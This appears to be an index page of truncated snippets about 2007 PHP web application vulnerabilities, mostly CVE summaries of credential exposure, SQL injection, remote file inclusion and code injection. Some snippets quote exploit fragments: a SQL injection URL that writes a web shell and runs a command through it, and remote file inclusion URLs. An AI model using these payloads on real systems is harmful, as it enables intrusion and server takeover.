CVE-2007-3530

PHPDirector 0.21 and earlier stores the admin account name and password in config.php, which allows local users to gain privileges by reading this file...

Design/Logic Flaw

PHPDirector 0.21 and earlier stores the admin account name and password in config.php, which allows local users to gain privileges by reading this file...

CVE-2007-3530

CVE-2007-3530 affects PHPDirector 0.21 and earlier. The admin account name and password are stored in config.php, which allows local users to gain privileges by reading that file. The vulnerability is a local privilege escalation due to insecure storage of credentials. The available sources confi...

CVE-2007-3530

PHPDirector 0.21 and earlier stores the admin account name and password in config.php, which allows local users to gain privileges by reading this file...

PHPDirector 0.21 - videos.php?id SQL Injection

PHPDirector 0.21 - videos.php?id SQL Injection PHPDirector ',3,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%20'pathfounded/shell.php'%20FROM%20ppconfig 3. http://www.site.com/shell.php?cmd=uname -a GREETZ: all memberz of RST and milw0rm //kw3rln http://rstzone.net milw0rm.com 200...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in myBloggie 2.1.5 allow remote attackers to execute arbitrary PHP code via a URL in the bloggierootpath parameter to 1 config.php; 2 db.php, 3 template.php, 4 functions.php, and 5 classes.php in includes/; 6 viewmode.php; and 7 blogbody.php. NOT...

mybloggie-rfi.txt

myBloggie 2.1.5 RFI Author: Yaser Homepage: http://www.ayyildiz.org Download S : http://mywebland.com/download.php?id=19 Exploits: http://site/config.php?bloggierootpath=evilcode? http://site/includes/db.php?bloggierootpath=evilcode? http://site/includes/template.php?bloggierootpath=evilcode?...

Code injection

Direct static code injection vulnerability in adminconfig.php in NavBoard 2.6.0 allows remote attackers to inject arbitrary PHP code into data/config.php via multiple parameters, as demonstrated via the threadperpage parameter in an editconfig action...

CVE-2007-2899

The CVE-2007-2899 entry affects NavBoard 2.6.0, with the vulnerability in admin_config.php allowing direct static code injection to data/config.php via multiple parameters (demonstrated via threadperpage in editconfig). Root cause: insecure handling of input leading to PHP code injection. Impact,...

CVE-2007-2899

Direct static code injection vulnerability in adminconfig.php in NavBoard 2.6.0 allows remote attackers to inject arbitrary PHP code into data/config.php via multiple parameters, as demonstrated via the threadperpage parameter in an editconfig action...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in FireFly 1.1.01 allow remote attackers to execute arbitrary PHP code via a URL in the docroot parameter to 1 localize.php or 2 config.php in modules/admin/include/...

Code injection

admin/config.php in the music-on-hold module in freePBX 2.2.x allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in the del parameter...

sunshop v4 >> RFI

vendor : turnkeywebtools.com by : s3rv3rhack3r [email protected] bugz: ++++++++++++++++++++ include/payment/payflowpro.php include $abspath."/include/payment/payflowpro/pfpro.class.php"; ++++++++++++++++++++ global.php requireonce $abspath."/libsecure.php"; ++++++++++++++++++++ libsecure.php inclu...

Remote file inclusion

PHP remote file inclusion vulnerability in config.php in Built2Go PHP Link Portal 1.79 allows remote attackers to execute arbitrary PHP code via a URL in the fullpathtodb parameter...

Firefly 1.1.01 - doc_root Remote File Inclusion

Firefly 1.1.01 - docroot Remote File Inclusion firefly 1.1.01 = Remote File Include Vulnerablitiy D.Script: http://fresh.t-systems-sfr.com/unix/src/privat2/firefly-1.1.01.tar.gz Discovered by: Alkomandoz Hacker Homepage: asb-may.net & mohandko.com & sniper-sa.com & Tryag.com...

JulmaCMS 1.4 - 'file.php' Remote File Disclosure

JulmaCMS 1.4file.php fileRemote File Disclosure D.Script: http://julmajanne.com/downloads/julma.zip Discovered by: GolDM = Mahmoodali Homepage: http://www.Tryag.cc V.Code In /file.php: /file.php dir . $file; $fname = basename$file; $mime = mimetype"mime", $fname; header"Content-Type: $mime";...

JulmaCMS 1.4 - file.php Remote File Disclosure

JulmaCMS 1.4 - file.php Remote File Disclosure JulmaCMS 1.4file.php fileRemote File Disclosure D.Script: http://julmajanne.com/downloads/julma.zip Discovered by: GolDM = Mahmoodali Homepage: http://www.Tryag.cc V.Code In /file.php: /file.php dir . $file; $fname = basename$file; $mime =...

postrev-rfi.txt

Post Revolution Remote File Inclusion Affected Software .: Post Revolution 6.6 / 7.0 Release Candidate 2 Download..: http://www.fabio.com.ar/postrev/ Risk ..............: high Date .........: 25/3/2007 Found by ..........: InyeXion Contact ...........: InyeXionatgmail.com Web .............:...

Code injection

Static code injection vulnerability in process.php in AimStats 3.2 allows remote attackers to inject PHP code into config.php via the number parameter in an update action...

CVE-2007-2167

The CVE-2007-2167 issue affects AimStats 3.2 and is caused by a vulnerability in process.php where the number parameter in an update action allows remote attackers to inject PHP code into config.php. This is a static code injection scenario that could enable arbitrary code execution in the PHP en...